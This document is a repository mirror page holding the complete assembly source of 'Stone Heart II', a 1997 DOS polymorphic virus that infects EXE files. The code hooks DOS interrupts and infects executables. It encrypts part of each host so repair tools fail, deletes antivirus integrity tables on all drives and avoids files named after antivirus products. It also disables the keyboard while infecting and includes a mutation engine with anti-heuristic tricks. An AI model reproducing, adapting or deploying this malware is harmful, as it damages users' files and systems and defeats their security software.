mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-22 01:58:51 +00:00
4b9382ddbc
push
1014 lines
25 KiB
NASM
1014 lines
25 KiB
NASM
|
||
; ÜÜ Û
|
||
; ßßß Virus Magazine Û Box 176, Kiev 210, Ukraine IV 1997
|
||
; ßÛÛ ßßßßßßßßßßßßßßßß Û ßßßßßßßßßßßßßßßßßßß ß ßßßßÞßßß ÛßßßßßßÛ
|
||
; ÞÛ ÛßÜ Ûßß Üßß Üßß ÜÛÜ Üßß ÛßÛ Ý Û ÜßÛ Û Üßß ÛÜÜ Û Û Û Û
|
||
; Û Û Û Ûß Ûß Û Û Ûß Û Û Û Û Û Û Û Û Û Û Û Û Û
|
||
; Û Þ Þ Þ ÞÜÜ ÞÜÜ Þ ÞÜÜ ÞÜß ßÛ ßÜÛ Þ ÞÜÜ ÞÜÜÜ Û Û Û Û
|
||
; Þ ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ÛÜÜÜÜÜÜÛ
|
||
; (C) Copyright, 1994-97, by STEALTH group WorldWide, unLtd.
|
||
|
||
; Stone Heart II
|
||
;
|
||
; <20>¥§¨¤¥âë© ¯®«¨¬®àäë© ¢¨àãá ¯¥à¥¬¥®© ¤«¨ë, ¯®à ¦ î騩 EXE
|
||
; ä ©«ë > 4096 ¡ ©â.
|
||
; ˜¨äàã¥â ç áâì ª®¤ ¯à®£à ¬¬ë (512 ¡ ©â ¯®á«¥ § £®«®¢ª ), ¡« £®¤ àï
|
||
; 祬㠥 «¥ç¨âáï Adinf ¨«¨ TbClean.
|
||
; ‘®¤¥à¦¨â ¥áª®«ìª® ¯à®áâëå, ® íä䥪⨢ëå ¯à¨¥¬®¢ ¯à®â¨¢ í¢à¨á⨪¨
|
||
; (¥ ®¡ à㦨¢ ¥âáï DrWeb, F-Prot, AVP ¨ â.¤.). Tbav ¨®£¤ à㣠¥âáï,
|
||
; ® ।ª® ¨ ¥ á¨«ì® (®¤¨-¤¢ ä« £ ).
|
||
; “¤ «ï¥â ¯à¨ áâ à⥠Ž<>™ˆ… â ¡«¨æë Adinf ¢á¥å à §¤¥« å ¢¨ç¥áâ¥à .
|
||
; ‡ ¨¬ ¥â ¢ ¯ ¬ï⨠®ª®«® 5 Š¡. “á¯¥è® à ¡®â ¥â ¢ DOS á¥áᨨ Windows
|
||
; 95. ‘â à ¥âáï ¥ § à ¦ âì ⨢¨àãáë.
|
||
;
|
||
; (c) Eternal Maverick 1997
|
||
|
||
.model tiny
|
||
.code
|
||
;-------------------------------------------------
|
||
vl equ offset bytes - start
|
||
base equ offset endv - start
|
||
CrLen equ (vl+200h+1)/2
|
||
;-------------------------------------------------
|
||
start:
|
||
;-------------------------------------------------
|
||
; Very lame Anti-heuristic trick!
|
||
; But it works against DrWeb...
|
||
;-------------------------------------------------
|
||
mov ah,62h
|
||
int 21h
|
||
mov ax,es
|
||
cmp ax,bx
|
||
je NoHer
|
||
fuck_it:
|
||
cld
|
||
call mist
|
||
mist:
|
||
pop si
|
||
add si,20h
|
||
push cs
|
||
pop es
|
||
mov cx,500h
|
||
rep stosw
|
||
jmp short fuck_it
|
||
;-------------------------------------------------
|
||
NoHer:
|
||
push es
|
||
no_es:
|
||
call next
|
||
next:
|
||
mov ah,2Ah
|
||
mov bx,'EM' ; Are you there ?
|
||
int 21h
|
||
install:
|
||
cmp bx,'ME' ; You ask!
|
||
je restore ; Already installed...
|
||
|
||
pop si
|
||
push si
|
||
sub si,offset next - start
|
||
push es
|
||
mov ax,word ptr ds:[02h]
|
||
sub ax,(vl/16) + 1
|
||
mov es,ax
|
||
call remove
|
||
pop ds
|
||
mov si,0Ah
|
||
mov di,offset fail - start + 1
|
||
movsw
|
||
movsw
|
||
mov word ptr ds:[si-4],offset INT22h - start
|
||
mov word ptr ds:[si-2],es
|
||
mov ds,cx
|
||
mov si,084h
|
||
mov di,offset old21h - start + 1
|
||
movsw
|
||
movsw
|
||
;------------------------------------
|
||
; Adinf tables to kill!
|
||
;------------------------------------
|
||
; P.S. Adinf - a nasty bitch,
|
||
; creating checksum tables
|
||
; on every hard disk drive.
|
||
;------------------------------------
|
||
call DelTab
|
||
mask1 db 'C:\*.*',0
|
||
restore:
|
||
pop si
|
||
pop dx
|
||
push dx
|
||
add dx,10h
|
||
push dx
|
||
|
||
add dx,20h
|
||
sub dx,word ptr cs:[si+offset bytes - next + 08h]
|
||
mov ax,word ptr cs:[si+offset CodeKey-next]
|
||
mov ds,dx
|
||
mov cx,100h
|
||
xor di,di
|
||
Decrypt:
|
||
xor word ptr ds:[di],ax
|
||
inc di
|
||
inc di
|
||
loop Decrypt
|
||
|
||
pop dx
|
||
push cs
|
||
pop ds
|
||
mov cx,word ptr ds:[si+offset bytes-next+06h]
|
||
or cx,cx
|
||
jz No_Relocation
|
||
mov bx,word ptr ds:[si+offset bytes-next+18h]
|
||
Next_Relo:
|
||
les di,dword ptr ds:[si+bx+offset bytes-next]
|
||
mov ax,es
|
||
add ax,dx
|
||
mov es,ax
|
||
add word ptr es:[di],dx
|
||
add bx,4
|
||
loop Next_Relo
|
||
No_Relocation:
|
||
pop es
|
||
mov cx,word ptr ds:[si+offset bytes-next]
|
||
mov cx,dx
|
||
cli
|
||
add cx,word ptr ds:[si+offset bytes-next+0Eh]
|
||
mov ss,cx
|
||
mov sp,word ptr ds:[si+offset bytes-next+10h]
|
||
sti
|
||
add dx,word ptr ds:[si+offset bytes-next+16h]
|
||
push dx
|
||
push word ptr ds:[si+offset bytes-next+14h]
|
||
push es
|
||
pop ds
|
||
xor ax,ax
|
||
xor bx,bx
|
||
xor si,si
|
||
xor di,di
|
||
retf
|
||
DelTab:
|
||
pop di
|
||
push cs
|
||
pop ds
|
||
mov ax,3524h
|
||
int 21h
|
||
push es bx
|
||
lea dx,[di+offset int24h - mask1]
|
||
mov ah,25h
|
||
int 21h
|
||
mov ah,2fh
|
||
int 21h
|
||
push es bx
|
||
lea dx,[di+offset NewBytes - mask1]
|
||
mov ah,1Ah
|
||
int 21h
|
||
mov byte ptr ds:[di],'C'
|
||
mov dx,di
|
||
NextDisk:
|
||
push ds dx
|
||
mov cx,07
|
||
mov ah,4eh
|
||
int 21h
|
||
jc NotFound
|
||
NextKill:
|
||
mov ah,2fh
|
||
int 21h
|
||
pop di
|
||
mov ax,word ptr ds:[di]
|
||
push di
|
||
push es
|
||
pop ds
|
||
mov dl,byte ptr ds:[bx+1Eh+06]
|
||
cmp dl,al
|
||
jne NextFile
|
||
mov word ptr ds:[bx+1bh],ax
|
||
mov byte ptr ds:[bx+1dh],'\'
|
||
lea dx,[bx+1bh]
|
||
xor cx,cx
|
||
mov ax,4301h
|
||
int 21h
|
||
mov cl,07
|
||
mov ah,3ch
|
||
int 21h
|
||
NextFile:
|
||
pop dx ds
|
||
push ds dx
|
||
mov ah,4fh
|
||
int 21h
|
||
jnc NextKill
|
||
NotFound:
|
||
pop dx ds
|
||
mov di,dx
|
||
inc byte ptr ds:[di]
|
||
cmp al,12h
|
||
je NextDisk
|
||
pop dx ds
|
||
mov ah,1ah
|
||
int 21h
|
||
pop dx ds
|
||
mov ax,2524h
|
||
int 21h
|
||
jmp restore
|
||
remove:
|
||
push cs
|
||
pop ds
|
||
mov cx,vl/2
|
||
xor di,di
|
||
rep movsw
|
||
ret
|
||
set21h:
|
||
cli
|
||
mov si,084h
|
||
mov word ptr ds:[si],offset int21h - start
|
||
mov word ptr ds:[si+2],es
|
||
sti
|
||
ret
|
||
int22h:
|
||
mov ah,48h
|
||
mov bx,(vl+400h + offset endcode - start)/16 + 1
|
||
int 21h
|
||
jc fail
|
||
mov es,ax
|
||
dec ax
|
||
mov ds,ax
|
||
xor si,si
|
||
mov word ptr ds:[si+1],70h
|
||
call remove
|
||
mov ds,cx
|
||
call set21h
|
||
fail:
|
||
db 0EAh,0,0,0,0
|
||
int21h:
|
||
cmp ah,4bh
|
||
je check
|
||
cmp ah,3dh
|
||
je check
|
||
cmp ah,43h
|
||
je check
|
||
;----------------------
|
||
; Here I am, Boss!
|
||
;----------------------
|
||
cmp ah,2Ah
|
||
jne old21h
|
||
cmp bx,'EM'
|
||
jne old21h
|
||
xchg bh,bl
|
||
iret
|
||
;--------------------------------
|
||
old21h: db 0EAh,0,0,0,0
|
||
int24h:
|
||
mov al,3
|
||
iret
|
||
check:
|
||
;---------------------------------------
|
||
; Check if it is a proper file
|
||
; for infection
|
||
;---------------------------------------
|
||
push bp si di es bx cx ax dx ds
|
||
|
||
mov di,dx
|
||
mov si,di
|
||
push ds
|
||
pop es
|
||
mov ax,1211h
|
||
int 2Fh ; Converts ASCIIZ line into UpCase letters
|
||
cld
|
||
sub di,4
|
||
mov ax,'XE'
|
||
scasw
|
||
jne abort
|
||
scasb
|
||
jne abort ; Not EXE...
|
||
|
||
cmp byte ptr es:[di-5],'F' ; Adin'F' - ?
|
||
je abort ; Don't touch it.
|
||
|
||
sub di,12 ; 12 = Filename + '.' + Extention
|
||
|
||
;---------------------
|
||
; Check if file name
|
||
; contains digits
|
||
;---------------------
|
||
mov si,di
|
||
push es
|
||
pop ds
|
||
mov cx,8
|
||
isDigit:
|
||
lodsb
|
||
cmp al,'0'
|
||
jb noDigit
|
||
cmp al,'9'
|
||
jbe abort
|
||
noDigit:
|
||
loop isDigit
|
||
;---------------------
|
||
; Check for antivirus
|
||
; names
|
||
;---------------------
|
||
push cs
|
||
pop ds
|
||
mov cl,6
|
||
ChkThis:
|
||
push cx
|
||
mov si,offset antiv - start
|
||
mov cl,6
|
||
DoComp:
|
||
cmpsw
|
||
jne NextStr
|
||
cmpsb
|
||
je ExitComp
|
||
dec si
|
||
dec di
|
||
NextStr:
|
||
inc si
|
||
dec di
|
||
dec di
|
||
loop DoComp
|
||
|
||
inc di
|
||
pop cx
|
||
loop ChkThis
|
||
;---------------------
|
||
ExitComp:
|
||
or cx,cx
|
||
jz Okey ; Good file
|
||
|
||
pop cx
|
||
abort:
|
||
jmp _esc
|
||
Okey:
|
||
;---------------------------------------
|
||
; Save & set INT 24h
|
||
;---------------------------------------
|
||
mov ax,3524h
|
||
call INT_21h
|
||
|
||
mov word ptr ds:[base],bx
|
||
mov word ptr ds:[base+2],es
|
||
|
||
mov ax,2524h
|
||
mov dx,offset int24h - start
|
||
call INT_21h
|
||
|
||
;---------------------------------------
|
||
; Turn keyboard off
|
||
;---------------------------------------
|
||
in al,21h
|
||
or al,00000010b
|
||
out 21h,AL
|
||
;---------------------------------------
|
||
pop ds dx
|
||
push dx ds
|
||
mov ax,4300h
|
||
call INT_21h
|
||
|
||
push cx
|
||
|
||
test cl,00000100b ; System file - ?
|
||
jnz protect ; Don't touch it!!!
|
||
|
||
;----------------------------------------
|
||
; Checking for protected floppy
|
||
; using 3F5h port
|
||
;----------------------------------------
|
||
push dx
|
||
mov cx,400h
|
||
mov dx,3F5h
|
||
mov al,4
|
||
out dx,al
|
||
wait_1:
|
||
loop wait_1
|
||
|
||
mov cx,400h
|
||
out dx,al
|
||
wait_2:
|
||
loop wait_2
|
||
|
||
in al,dx
|
||
test al,40h ; Protected disk - ?
|
||
pop dx
|
||
jnz protect
|
||
;----------------------------------
|
||
pop cx
|
||
push cx
|
||
and cl,0FEh ; Set READ-ONLY off
|
||
mov ax,4301h
|
||
call INT_21h
|
||
jnc FileOk
|
||
;-------------------------------
|
||
; Not able to change attribute
|
||
;-------------------------------
|
||
protect:
|
||
pop cx
|
||
jmp esc_1
|
||
FileOk:
|
||
push dx ds
|
||
mov ax,3D02h
|
||
call INT_21h ; DOS Services ah=function 3Dh
|
||
; open file, al=mode,name@ds:dx
|
||
|
||
mov word ptr cs:[base+06h],ax
|
||
mov ax,5700h
|
||
call FileX ; DOS Services ah=function 57h
|
||
; get/set file date & time
|
||
push dx cx
|
||
cmp cl,0Fh ; Is it already infected?
|
||
je esc2
|
||
|
||
push cs
|
||
pop ds
|
||
mov dx,offset Bytes - start
|
||
mov cx,400h
|
||
call ReadX ; DOS Services ah=function 3Fh
|
||
; read file, cx=bytes, to ds:dx
|
||
call SeekE
|
||
|
||
cmp ax,1000h ; File too small to be infected - ?
|
||
jb esc2
|
||
|
||
mov si,offset Bytes - start
|
||
cmp word ptr ds:[si],'MZ'
|
||
je ExeOk
|
||
cmp word ptr ds:[si],'ZM'
|
||
jne esc2
|
||
ExeOk:
|
||
;---------------------------------------
|
||
; Is header longer than 512 bytes ?
|
||
;---------------------------------------
|
||
cmp word ptr ds:[si+8],20h
|
||
ja esc2
|
||
;---------------------------------------
|
||
; Is this EXE segmented ?
|
||
;---------------------------------------
|
||
push dx ax
|
||
mov di,200h
|
||
div di
|
||
dec ax
|
||
cmp ax,word ptr ds:[si+04h]
|
||
pop ax dx
|
||
jbe Not_Segmented
|
||
esc2:
|
||
jmp esc_2
|
||
;----------------------------------------
|
||
Not_Segmented:
|
||
mov di,offset NewBytes - start
|
||
push ds
|
||
pop es
|
||
mov cx,0Ch
|
||
rep movsw
|
||
|
||
mov cx,10h
|
||
div cx
|
||
|
||
sub ax,word ptr ds:[si+1024-18h+08h]
|
||
mov word ptr ds:[si+1024-18h+16h],ax ; ReloCS
|
||
mov word ptr ds:[si+1024-18h+14h],dx ; ExeIP
|
||
mov word ptr ds:[offset SaveOff - Start],dx
|
||
;----------------------------------------
|
||
; Reseting STACK
|
||
;----------------------------------------
|
||
add ax,(vl+200h)/16+1
|
||
mov word ptr ds:[si+1024-18h+0Eh],ax ; ReloSS
|
||
add dx,400h
|
||
and dl,not 1 ; To avoid an odd stack
|
||
mov word ptr ds:[si+1024-18h+10h],dx ; ReloSP
|
||
;----------------------------------------
|
||
again:
|
||
in ax,40h
|
||
or ax,ax
|
||
jz again
|
||
|
||
mov word ptr ds:[offset CodeKey - start],ax
|
||
mov di,offset Bytes - start + 200h
|
||
push di
|
||
mov cx,100h
|
||
Encrypt:
|
||
xor word ptr ds:[di],ax
|
||
inc di
|
||
inc di
|
||
loop Encrypt
|
||
|
||
push si
|
||
xor si,si
|
||
mov di,cs
|
||
add di,(offset buffer - start)/16 + 1
|
||
mov es,di
|
||
call emme11
|
||
|
||
pop si
|
||
push di
|
||
xor dx,dx
|
||
mov ax,word ptr ds:[si+1024-18h+02h]
|
||
add ax,di
|
||
mov di,200h
|
||
div di
|
||
add word ptr ds:[si+1024-18h+04h],ax ; FileSize in 512-byte blocks
|
||
mov word ptr ds:[si+1024-18h+02h],dx ; Rest of bytes
|
||
mov word ptr ds:[si+1024-18h+06h],0 ; Set number of relocation
|
||
; table elements to 0
|
||
|
||
pop cx
|
||
push es
|
||
pop ds
|
||
xor dx,dx
|
||
call WriteX ; Write virus body
|
||
push cs
|
||
pop ds
|
||
call SeekH
|
||
mov dx,offset NewBytes - start
|
||
call WriteH ; Write first 18h bytes (header)
|
||
xor al,al
|
||
mov dx,200h
|
||
call SeekY
|
||
mov cx,200h
|
||
pop dx
|
||
call WriteX
|
||
Marker:
|
||
pop cx
|
||
mov cl,0Fh ; Set time to mark infection
|
||
push cx
|
||
esc_2:
|
||
pop cx dx
|
||
mov ax,5701h
|
||
call FileX ; DOS Services ah=function 57h
|
||
; get/set file date & time
|
||
mov ah,3Eh
|
||
call FileX ; DOS Services ah=function 3Eh
|
||
; close file, bx=file handle
|
||
pop ds dx cx
|
||
mov ax,4301h
|
||
call INT_21h ; DOS Services ah=function 43h
|
||
; get/set file attrb, nam@ds:dx
|
||
esc_1:
|
||
;-----------------------------
|
||
; Restore int 24h
|
||
;-----------------------------
|
||
lds dx,dword ptr cs:[base]
|
||
mov ax,2524h
|
||
call INT_21h
|
||
;-----------------------------
|
||
; Enable IRQ-1
|
||
; User can play with keyboard
|
||
; again.
|
||
;-----------------------------
|
||
in al,21h
|
||
and al,not 2
|
||
out 21h,al
|
||
;-----------------------------
|
||
_ESC:
|
||
pop ds dx ax cx bx es di si bp
|
||
jmp old21h ; No other actions.
|
||
|
||
db 'StoneHeart II' ; Virus name
|
||
|
||
ReadX:
|
||
mov ah,3Fh
|
||
jmp short FileX
|
||
WriteH:
|
||
mov cx,18h
|
||
WriteX:
|
||
mov ah,40h
|
||
jmp short FileX
|
||
SeekH:
|
||
xor al,al
|
||
jmp short SeekX
|
||
SeekE:
|
||
mov al,02
|
||
SeekX:
|
||
xor dx,dx
|
||
SeekY:
|
||
xor cx,cx
|
||
SeekZ:
|
||
mov ah,42h
|
||
FileX:
|
||
mov bx,word ptr cs:[base+06h] ; File Handle is stored there...
|
||
INT_21h:
|
||
pushf
|
||
call dword ptr cs:[offset old21h - start+1]
|
||
ret
|
||
CodeKey:
|
||
dw 0 ; This word is used to crypt
|
||
; a part of file
|
||
;-----------------------------------------------------------------
|
||
; These shity programs are too stinky to be even infected
|
||
;-----------------------------------------------------------------
|
||
ANTIV db 'AID','AVP','PRO','SCA','EXT','WEB'
|
||
;-----------------------------------------------------------------
|
||
; Polymorphic Engine of Stone Heart II
|
||
;-----------------------------------------------------------------
|
||
Emme11:
|
||
call modulof
|
||
modulof:
|
||
pop bp
|
||
sub bp,3
|
||
;--------------------------------------------------------------------------
|
||
; PARAMETERS:
|
||
; ES - points to buffer of proper size.
|
||
; DS - points to segment of code to be encrypted.
|
||
; SI - offset of code to be crypted.
|
||
; CrLen - number of words (NOT BYTES!!!) to be crypted.
|
||
; SaveOff - delta offset in file (Length + 100h for appending
|
||
; COM infector, for example)
|
||
;
|
||
; When finished:
|
||
; …S:0 - crypted code.
|
||
; DI - its size in bytes.
|
||
;--------------------------------------------------------------------------
|
||
; A structure of encryptor:
|
||
; -------------------------
|
||
;
|
||
; mov reg1,offcode ; offcode - offset of crypted code
|
||
; mov reg2,-CrLen
|
||
; mov reg3,code_1
|
||
;Decode:
|
||
; oper1 word ptr ds:[reg1],reg3
|
||
; inc reg1
|
||
; inc reg1
|
||
; oper2 reg3,code_2
|
||
; inc reg2
|
||
; jnz Decode
|
||
;
|
||
; --------------------------------
|
||
;
|
||
; reg1 - SI,DI,BX or BP
|
||
; reg2,reg3 - AX,BX,CX,DX,BP,SI or DI
|
||
; oper1 - XOR,ADD or SUB
|
||
; oper2 - ADD or SUB
|
||
;
|
||
; code_1,code_2 - random numbers
|
||
;
|
||
; All unused in decryptor registers are used in garbage instructions.
|
||
;--------------------------------------------------------------------------
|
||
PolyStart:
|
||
in al,40h
|
||
or al,al
|
||
jz PolyStart
|
||
|
||
push si
|
||
|
||
xor di,di
|
||
|
||
call makeini
|
||
|
||
inc byte ptr [bp+offset Reg - Emme11]
|
||
|
||
lea si,[bp+offset anti-Emme11]
|
||
mov cx,05h
|
||
ANTI_HER:
|
||
cmp cl,2
|
||
jne noGlue
|
||
mov al,75h
|
||
stosb
|
||
push di
|
||
inc di
|
||
noGlue:
|
||
call make
|
||
movsw
|
||
loop anti_her
|
||
|
||
pop bx
|
||
mov ax,di
|
||
sub ax,bx
|
||
dec ax
|
||
dec ax
|
||
dec ax
|
||
mov byte ptr es:[bx],al
|
||
|
||
;---------------------------------------------
|
||
; Creating a decryptor
|
||
;---------------------------------------------
|
||
|
||
call makeini
|
||
|
||
;---------------------------------------------
|
||
; First instruction
|
||
;---------------------------------------------
|
||
instr1:
|
||
call ZeroTwo
|
||
|
||
mov al,byte ptr ds:[bx+offset Pack_1-Emme11]
|
||
stosb
|
||
push di ; Needed for decryptor
|
||
stosw ; To reserve a place for offset
|
||
mov al,byte ptr ds:[bx+3+offset Pack_1-Emme11]
|
||
mov byte ptr ds:[si+1],al
|
||
mov al,byte ptr ds:[bx+6+offset Pack_1-Emme11]
|
||
mov ah,al
|
||
mov word ptr ds:[si+2],ax
|
||
sub al,40h
|
||
mov bl,al
|
||
call _fill ; Make a register busy
|
||
call make
|
||
;-----------------------------------------------
|
||
; Second instruction
|
||
;-----------------------------------------------
|
||
instr2:
|
||
call f_reg
|
||
in ax,40h
|
||
and ax,0Fh
|
||
add ax,CrLen
|
||
add bl,48h
|
||
mov byte ptr ds:[si+7],bl
|
||
|
||
stosw
|
||
|
||
call make
|
||
;------------------------------------------------
|
||
; Third instruction
|
||
;------------------------------------------------
|
||
instr3:
|
||
call f_reg
|
||
|
||
mov byte ptr ds:[si+5],bl
|
||
|
||
mov al,8
|
||
mul bl
|
||
add byte ptr ds:[si+1],al
|
||
in ax,40h
|
||
add ax,di
|
||
stosw
|
||
push di
|
||
mov word ptr ds:[bp+offset encryptor - Emme11 - 3],ax
|
||
call make
|
||
;--------------------------------------------------
|
||
; To choose operations
|
||
;--------------------------------------------------
|
||
call ZeroTwo
|
||
|
||
mov al,byte ptr ds:[offset mirror1 - Emme11 + bx]
|
||
mov byte ptr ds:[si],al
|
||
sub bx,bp
|
||
neg bx
|
||
add bx,bp
|
||
mov al,byte ptr ds:[offset mirror1 - Emme11 + bx + 2]
|
||
mov byte ptr ds:[bp+offset encryptor-Emme11+2],al
|
||
|
||
call rnd
|
||
|
||
and bl,1
|
||
add bx,bp
|
||
mov al,byte ptr ds:[offset mirror2 - Emme11 + bx]
|
||
add byte ptr ds:[si+5],al
|
||
add al,3
|
||
mov byte ptr ds:[bp+offset encryptor-Emme11+6],al
|
||
|
||
;-----------------------------------------------------
|
||
; To copy rest of decryptor
|
||
;-----------------------------------------------------
|
||
movsw
|
||
call make
|
||
movsb
|
||
call make
|
||
movsb
|
||
call make
|
||
movsw
|
||
in al,40h
|
||
mov byte ptr ds:[bp+offset encryptor - Emme11 + 7],al
|
||
stosb
|
||
inc si
|
||
call make
|
||
movsw
|
||
mov ax,0FFh
|
||
sub ax,di
|
||
pop bx
|
||
add ax,bx ; BYTE for JNZ instruction
|
||
stosb
|
||
call make
|
||
|
||
pop si
|
||
mov ax,word ptr ds:[SaveOff]
|
||
add ax,di
|
||
mov word ptr es:[si],ax ; Offset of crypted code
|
||
|
||
|
||
mov cx,CrLen
|
||
mov bx,0FFFFh
|
||
pop si
|
||
encryptor:
|
||
movsw
|
||
xor word ptr es:[di-2],bx
|
||
sub bx,0
|
||
loop encryptor
|
||
|
||
ret
|
||
|
||
makeini:
|
||
mov byte ptr ds:[bp+offset Reg - Emme11],10h
|
||
make:
|
||
;-----------------------
|
||
; Makes from 1 up to 8
|
||
; bytes of garbage code
|
||
;-----------------------
|
||
in ax,40h
|
||
and ax,00000111b
|
||
inc ax ; Number of bytes
|
||
mov dx,ax
|
||
poly:
|
||
push dx
|
||
;------------------------------------
|
||
; Generate 1-byte command
|
||
;------------------------------------
|
||
form_1:
|
||
call rnd
|
||
|
||
add bx,bp
|
||
mov al,byte ptr ds:[bx+offset data_1-Emme11]
|
||
good_1:
|
||
stosb
|
||
dec dx
|
||
form_2:
|
||
;-------------------------------------
|
||
; Generate 2-bytes command
|
||
;-------------------------------------
|
||
cmp dx,2
|
||
jb PolyStop
|
||
|
||
call rnd
|
||
call _free
|
||
jnz form_3
|
||
|
||
mov al,8
|
||
mul bl
|
||
add al,0C0h
|
||
push ax
|
||
call rnd
|
||
pop ax
|
||
add al,bl
|
||
xchg ah,al
|
||
|
||
add bx,bp
|
||
mov al,byte ptr ds:[bx+offset data_2-Emme11]
|
||
stosw
|
||
dec dx
|
||
dec dx
|
||
form_3:
|
||
;-------------------------------------
|
||
; Generate 3-bytes command
|
||
;-------------------------------------
|
||
cmp dx,3
|
||
jb PolyStop
|
||
|
||
call _form
|
||
jnz form_4
|
||
mov al,83h
|
||
stosw
|
||
in al,40h
|
||
stosb
|
||
sub dx,3
|
||
form_4:
|
||
;-------------------------------------
|
||
; Generate 4-bytes command
|
||
;-------------------------------------
|
||
cmp dx,4
|
||
jb PolyStop
|
||
|
||
call _form
|
||
jnz PolyStop
|
||
mov al,81h
|
||
stosw
|
||
in ax,40h
|
||
xor ax,di
|
||
stosw
|
||
sub dx,4
|
||
PolyStop:
|
||
or dx,dx
|
||
jnz form_1
|
||
|
||
pop dx
|
||
|
||
ret
|
||
|
||
ZeroTwo:
|
||
call rnd
|
||
mov ax,bx
|
||
mov bl,3
|
||
div bl
|
||
mov bl,ah
|
||
add bx,bp
|
||
ret
|
||
|
||
;-----------------------------------------------------------------
|
||
Reg db 10h ; This byte is to mark registers
|
||
; involved in decryptor.
|
||
; 10h means don't use SP as a garbage
|
||
; register ;)
|
||
;-----------------------------------------------------------------
|
||
; Data for polymorphic engine
|
||
;-----------------------------------------------------------------
|
||
data_1 db 0f5h,0f8h,0f9h,0fbh,0fch,0fdh,09eh,090h
|
||
data_2 db 03h,0bh,013h,01bh,023h,02bh,033h,085h
|
||
pack_1:
|
||
mov_reg1 db 0beh,0bfh,0bbh
|
||
xor_reg1 db 04h,05h,07h
|
||
inc_reg1 db 046h,047h,043h
|
||
operations:
|
||
mirror1 db 01h,031h,029h
|
||
mirror2 db 0c0h,0e8h
|
||
;---------------------------------------------------------------------
|
||
db 'EMME Small 1.1' ; Small Eternal Maverick Mutation Engine
|
||
;---------------------------------------------------------------------
|
||
_form proc near
|
||
call rnd
|
||
and al,03Fh
|
||
add al,0C0h
|
||
xchg al,ah
|
||
_free:
|
||
push bx
|
||
push cx
|
||
mov cl,bl
|
||
mov bl,1
|
||
shl bl,cl
|
||
test byte ptr ds:[bp+offset Reg-Emme11],bl
|
||
jmp short popcxbx
|
||
f_reg:
|
||
call rnd
|
||
call _free
|
||
jnz f_reg
|
||
mov al,0B8h
|
||
add al,bl
|
||
stosb
|
||
_fill:
|
||
push bx
|
||
push cx
|
||
mov cl,bl
|
||
mov bl,1
|
||
shl bl,cl
|
||
add byte ptr ds:[bp+offset Reg-Emme11],bl
|
||
popcxbx:
|
||
pop cx
|
||
pop bx
|
||
ret
|
||
_form endp
|
||
|
||
rnd:
|
||
;---------------------------
|
||
; A bad way for getting a
|
||
; random number
|
||
;---------------------------
|
||
push dx
|
||
in ax,[40h]
|
||
add ax,word ptr ds:[bp+offset Seed-Emme11]
|
||
mov dx,25173
|
||
mul dx
|
||
add ax,13849
|
||
pop dx
|
||
mov word ptr ds:[bp+offset Seed-Emme11],ax
|
||
xor ax,word ptr ds:[bp+offset ForXor-Emme11]
|
||
mov bx,ax
|
||
and bx,7
|
||
ret
|
||
|
||
Seed dw 37849
|
||
ForXor dw 559
|
||
|
||
;--------------------------------
|
||
; Built-in anti-heuristic,
|
||
; bad against DrWeb, but good
|
||
; againt some other antiviruses
|
||
;--------------------------------
|
||
anti:
|
||
xor ax,ax
|
||
in ax,40h
|
||
or ax,ax
|
||
int 20h
|
||
push cs
|
||
pop ds
|
||
;--------------------------------
|
||
; Cryptor Pattern
|
||
;--------------------------------
|
||
Pattern:
|
||
xor word ptr ds:[di],bx
|
||
inc di
|
||
inc di
|
||
sub bx,0
|
||
inc cx
|
||
jnz Pattern
|
||
;----------------------------------------
|
||
; End of Polymorphic Engine
|
||
;----------------------------------------
|
||
bytes:
|
||
;----------------------------------------
|
||
; Victim file header
|
||
;----------------------------------------
|
||
db 10h dup (0)
|
||
dw offset vstack
|
||
dw 0
|
||
dw offset endv
|
||
db 2 dup (0)
|
||
;-----------------------------------------------------------------
|
||
db 400h-18h dup (0) ; Rest of files' first 1024 bytes
|
||
;-----------------------------------------------------------------
|
||
NewBytes:
|
||
db 18h dup (0) ; New header for infected file
|
||
endcode:
|
||
db 10h dup (0)
|
||
buffer:
|
||
db 0900h dup (0) ; Buffer for crypting
|
||
SaveOff dw 0 ; Used in polymorphic engine
|
||
endv:
|
||
mov ah,4ch
|
||
int 21h
|
||
.stack
|
||
dw 16 dup (0)
|
||
vstack:
|
||
end start |